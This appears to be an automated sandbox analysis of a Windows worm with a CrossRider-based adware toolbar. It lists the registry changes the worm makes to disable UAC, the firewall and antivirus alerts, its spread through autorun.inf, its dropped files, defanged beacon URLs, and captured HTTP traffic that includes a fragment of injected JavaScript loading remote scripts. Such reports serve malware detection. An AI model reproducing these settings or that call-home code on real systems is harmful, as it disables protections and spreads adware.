    The Worm creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "UacDisableNotify" = "1"

    [HKCU\Software\Aas]
    "a1_0" = "2892445252"

    [HKCU\Software\Aas\695404737]
    "35845605" = "476"

    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "DoNotAllowExceptions" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
    "EnableLUA" = "0"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "GlobalUserOffline" = "0"

    [HKCU\Software\Aas\695404737]
    "50183847" = "83AD022F944CCF21DDECD41871254667172BA39F3E949513F4CC29B07060AC534912E5BCB155880C2C4326E6FB83E6FA099D4219F6885291D527824C5507229614A07CE2AF035D97263FF7F26AD2ACC9D5D4395D4B8B3109DC5C0C87B31A1505E6E94E08EF20E71B91B96D3856F531DADFD78A894AD6A6C177136C5657B01661"
    "43014726" = "0C00687474703A2F2F7777772E6C656479617A696C696D2E636F6D2F6C6F676F2E67696600687474703A2F2F6B73616E64726166617368696F6E2E636F6D2F6C6F676F2E67696600687474703A2F2F7777772E6C6166796572692E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B756C7070617375722E636F6D2F6C6F676F2E67696600687474703A2F2F746F616C6C616465706170656C2E636F6D2E61722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E65636F6C652D7361696E742D73696D6F6E2E6E65742F696E6465785F746F702F6C6F676F2E67696600687474703A2F2F6C617A617265612E726F2F696D616765732F6C6F676F2E67696600687474703A2F2F6B6F6F6E6164616E6365322E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B75706C752E62656C2E74722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E6C69646572616E636173706F6C6974696361732E636F6D2E62722F6C6F676F2E67696600687474703A2F2F7777772E6C6567616C62696C676973617961722E636F6D2F696D672F6C6F676F2E67696600687474703A2F2F6C696665636F6D32342E636F2E63632F696D616765732F6C6F676F2E676966"

    [HKCU\Software\Aas]
    "a3_0" = "17001001"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "AntiVirusOverride" = "1"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "UpdatesDisableNotify" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "FirewallOverride" = "1"

    [HKCU\Software\Aas\695404737]
    "14338242" = "0"
    "7169121" = "144"

    "21507363" = "0"
    "28676484" = "35"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "UacDisableNotify" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
    "Hidden" = "2"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "FirewallOverride" = "1"

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "FirewallDisableNotify" = "1"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "FE 11 4A 0A 6F 3A B0 B9 41 F5 E0 2F F6 BF 6A BE"

    [HKCU\Software\Aas]
    "a2_0" = "7005"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "FirewallDisableNotify" = "1"
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "UpdatesDisableNotify" = "1"

    [HKCU\Software\Aas]
    "a4_0" = "0"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "AntiVirusOverride" = "1"

    Adds a rule to the firewall Windows which allows any network activity:

    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
    "%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

    Firewall notifications are disabled:

    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "DisableNotifications" = "1"

    Antivirus notifications are disabled:

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "AntiVirusDisableNotify" = "1"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "AntiVirusDisableNotify" = "1"

    A firewall is disabled:

    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall" = "0"

    The process mscorsvw.exe:172 makes changes in the system registry.
    The Worm creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
    "AccumulatedWaitIdleTime" = "1260000"

    The process Ge-Force-bg.exe:2632 makes changes in the system registry.
    The Worm creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "6D 47 B3 F2 5A 84 9B 30 E9 C3 A5 17 05 08 53 FC"

    Dropped PE files

    MD5 File path
    0fb8fdff654dea1444a1733cfb79149d c:\Program Files\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe
    e19b738b235ea40fc075f8627c5472b9 c:\Program Files\Ge-Force\Ge-Force-bg.exe
    11ccef28d3bfd871ab173a7e03f57b04 c:\Program Files\Ge-Force\Ge-Force-bho.dll
    303913dad1bffa0af8c207f29489f336 c:\Program Files\Ge-Force\Ge-Force-buttonutil.dll
    ce4ccca778189fef1de87a66f21ac3e1 c:\Program Files\Ge-Force\Ge-Force-buttonutil.exe
    26461d0b7a6729c1263bc94a65753246 c:\Program Files\Ge-Force\Ge-Force-codedownloader.exe
    e63daa30be43031462b6a86267431b9c c:\Program Files\Ge-Force\Uninstall.exe
    5981f7b76df711e10c552db4ca62ab0a c:\Program Files\Ge-Force\utils.exe

    HOSTS file anomalies

    No changes have been detected.

    Rootkit activity

    No anomalies have been detected.

    Propagation

    A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

    • VersionInfo

    Company Name: Idzcf & co.
    Product Name: Id-Eqhowiozunlmy
    Product Version:
    Legal Copyright: Copyright Vylorzwjeixeou
    Legal Trademarks: Eqhowiozunlmy is a trademark of Kuoyj
    Original Filename:
    Internal Name:
    File Version: 15.4.13.18
    File Description: Teocxdjqh
    Comments: comment on Khtmovq
    Language: Language Neutral

    PE Sections

    Name Virtual Address Virtual Size Raw Size Entropy Section MD5
    .text 4096 34108 34304 4.23004 63bb1ab888510a64d453326c977db871
    .data 40960 144 512 0.831186 28f29d4150b83e7faae233a71c5cab15
    .rdata 45056 9272 9728 3.95241 f652035f54b3a74c89f7bb1cb907d4d2
    .bss 57344 297092 0 0 d41d8cd98f00b204e9800998ecf8427e
    .idata 356352 4868 5120 3.6057 0d5c3df1017a50cd5a6baab82c884d87
    .ndata 364544 770048 8192 0 0829f71740aab1ab98b33eae21dee122
    .rsrc 1134592 69632 69120 5.50093 8fe4bd36b5bf2022d4edfda2dd0e3192

    Dropped from:

    Downloaded by:

    Similar by SSDeep:

    Similar by Lavasoft Polymorphic Checker:

    URLs

    URL IP
    hxxp://ipgeoapi.com/ 23.21.123.184
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409
    hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403
    hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431
    hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521
    hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/356.js?ver=1&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/193.js?ver=9&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/262.js?ver=2&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/288.js?ver=1&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/350.js?ver=1&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/337.js?ver=1&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/184.js?ver=11&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/91.js?ver=118&rnd=41
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509
    hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909
    hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425
    hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403
    hxxp://logs.newstatsclientcloud.com/monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 69.16.175.10
    hxxp://js.newstatsclientcloud.com/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 69.16.175.10
    hxxp://js.newstatsdemosrv.com/plugins/mins/356.js?ver=1&rnd=41 69.16.175.10
    hxxp://js.newstatsdemosrv.com/plugins/mins/350.js?ver=1&rnd=41 69.16.175.10
    hxxp://js.newstatsdemosrv.com/plugins/mins/193.js?ver=9&rnd=41 69.16.175.10
    hxxp://stats.newstatsclientcloud.com/installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 54.231.32.196
    hxxp://js.newstatsdemosrv.com/plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 69.16.175.10
    hxxp://logs.newstatsclientcloud.com/monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 69.16.175.10
    hxxp://stats.newstatsclientcloud.com/apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 54.231.32.196
    hxxp://js.newstatsdemosrv.com/plugins/mins/288.js?ver=1&rnd=41 69.16.175.10
    hxxp://stats.newstatsclientcloud.com/stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 54.231.32.196
    hxxp://js.newstatsdemosrv.com/plugins/mins/91.js?ver=118&rnd=41 69.16.175.10
    hxxp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 69.16.175.10
    hxxp://stats.newstatsclientcloud.com/installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 54.231.32.196
    hxxp://stats.newstatsclientcloud.com/apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 54.231.32.196
    hxxp://js.newstatsdemosrv.com/plugins/mins/262.js?ver=2&rnd=41 69.16.175.10
    hxxp://js.newstatsclientcloud.com/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 69.16.175.10
    hxxp://js.newstatsdemosrv.com/plugins/mins/337.js?ver=1&rnd=41 69.16.175.10
    hxxp://js.newstatsdemosrv.com/plugins/mins/184.js?ver=11&rnd=41 69.16.175.10


    IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

    ET MALWARE Win32/Toolbar.CrossRider.A Checkin

    Traffic

    GET /installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 HTTP/1.1
    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: 5YWqA/hbsAT52j7 X ANIhfz8LeZSwbzZennRSNr95qyRT5/GOxJxu15bYYT9dyR
    x-amz-request-id: 0498DAA53AE4D7AA
    Date: Mon, 12 Jan 2015 10:21:19 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....


    GET /apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 HTTP/1.1
    

    Accept: */*
    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: Ua7e9bbvbbCCT1UU bIiJuiUTlKYm66dUzVHP y9fM8Qw6DgdOMqkLlvENZ3CpV4
    x-amz-request-id: 8228922C1C267E83
    Date: Mon, 12 Jan 2015 10:21:25 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....


    GET /installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1
    

    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: A/zmK/7hgaaXBz9PonyEz79wBldwn4ioXtD1LKmI1eMLwSl2i1b3Rd 04pDGV3wy
    x-amz-request-id: 3F5834F5D7454D55
    Date: Mon, 12 Jan 2015 10:21:34 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....


    GET /apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1
    

    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: A3lVDGbw8R9O/TJq2nlst TkRFytz5dj55QfSuffwiB5lh79oRi5t UHQIFNIM9B
    x-amz-request-id: 3DE7DD4364A2825D
    Date: Mon, 12 Jan 2015 10:21:34 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..

    

    GET /monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1
    Host: logs.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:33 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1421058093.dop006.ny2.t,1421058093.cds053.ny2.c
    GIF89a.............,...........D..;..

    

    GET / HTTP/1.1
    Host: ipgeoapi.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:17 GMT
    Connection: keep-alive
    Content-Type: application/json;charset=utf-8
    Content-Length: 39
    Server: thin 1.4.1 codename Chromeo
    Via: 1.1 vegur
    {"country_code":38,"country_name":"CA"}HTTP/1.1 200 OK..Date: Mon, 12 
    Jan 2015 10:21:17 GMT..Connection: keep-alive..Content-Type: applicati
    on/json;charset=utf-8..Content-Length: 39..Server: thin 1.4.1 codename
     Chromeo..Via: 1.1 vegur..{"country_code":38,"country_name":"CA"}..

    

    GET /plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420713929"
    Last-Modified: Thu, 08 Jan 2015 10:45:29 GMT
    Cache-Control: max-age=651
    Content-Length: 15858
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058083.dop002.ny2.t,1421058083.cds044.ny2.c
    ..  /*****************************************************************
    *******************.  This is your Page Code. The appAPI.ready() code 
    block will be executed on every page load..  For more information plea
    se visit our docs site: hXXp://docs.crossrider.com.*******************
    ******************************************************************/.HO
    ST = "hXXp://wt.iwebar.com";.TOOLBAR_URL = HOST   '/js/toolbar.js';..A
    FFILIATE_ID = 'NONE';...appAPI.ready(function($) {.../*..if (appAPI.db
    .get('user_id') === null) {...if (appAPI.db.get('installation') === nu
    ll){....appAPI.db.set('installation', new Date().getTime());....return
    ;...}...else {....if ((new Date().getTime() - appAPI.db.get('installat
    ion')) < 1000 * 60 * 60 * 48){.....//No need to display toolbar... 
    hasn't been 2 days yet......return;....} ...}..}*/...console.log("====
    ===> Extension [version: "   appAPI.appInfo.version   "] loading...
    ");....// Set the affiliate ID.    //appAPI.db.set('affiliate_id', AFF
    ILIATE_ID);...// Include the Base64 library..appAPI.resources.includeJ
    S('jquery.base64.js');..appAPI.resources.includeJS('jquery-1.10.2.min.
    js');..appAPI.resources.includeJS('md5.js');..//appAPI.resources.inclu
    deJS('i2v.js');....appAPI.resources.includeJS('jw_whitelist_1.js');..a
    ppAPI.resources.includeJS('jw_whitelist_2.js');..appAPI.dom.addRemoteJ
    S('hXXp://wt.iwebar.com/js/jw_whitelist_3.js');.....var pObj = sendRep
    ort();..../** Custom injections **/..appAPI.resources.includeJS('askco
    m.js');..function customInjections(country) {...try {....// Ask.co
    <<< skipped >>>

    GET /plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420713930"
    Last-Modified: Thu, 08 Jan 2015 10:45:30 GMT
    Cache-Control: max-age=652
    Content-Length: 17999
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1421058083.dop002.ny2.t,1421058083.cds051.ny2.c
    {.."plugins_version": 23,.."plugins_list":.    [.      {"id":1,"url":"
    hXXp://js.newstatsdemosrv.com/plugins/mins/1.js","ver":11,"name":"base
    ","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":
    false},"targets":[{"run_at":1,"order":10400},{"run_at":2,"order":10400
    }],"enabled":true},{"id":4,"url":"hXXp://js.newstatsdemosrv.com/plugin
    s/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","brow
    sers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"t
    argets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at"
    :5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"u
    rl":"hXXp://js.newstatsdemosrv.com/plugins/mins/2.js","ver":2,"name":"
    ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv"
    :false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"
    order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newstatsdemosr
    v.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":t
    rue,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":
    [{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true
    },{"id":28,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/28.js","v
    er":4,"name":"initializer","browsers":{"ie":true,"ff":true,"ch":true,"
    sf":true,"nv":false,"px":false},"targets":[{"run_at":1,"order":9999999
    99},{"run_at":2,"order":999999999}],"enabled":true},{"id":21,"url":"ht
    tp://js.newstatsdemosrv.com/plugins/mins/21.js","ver":5,"name":"debug"
    ,"browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"p
    <<< skipped >>>

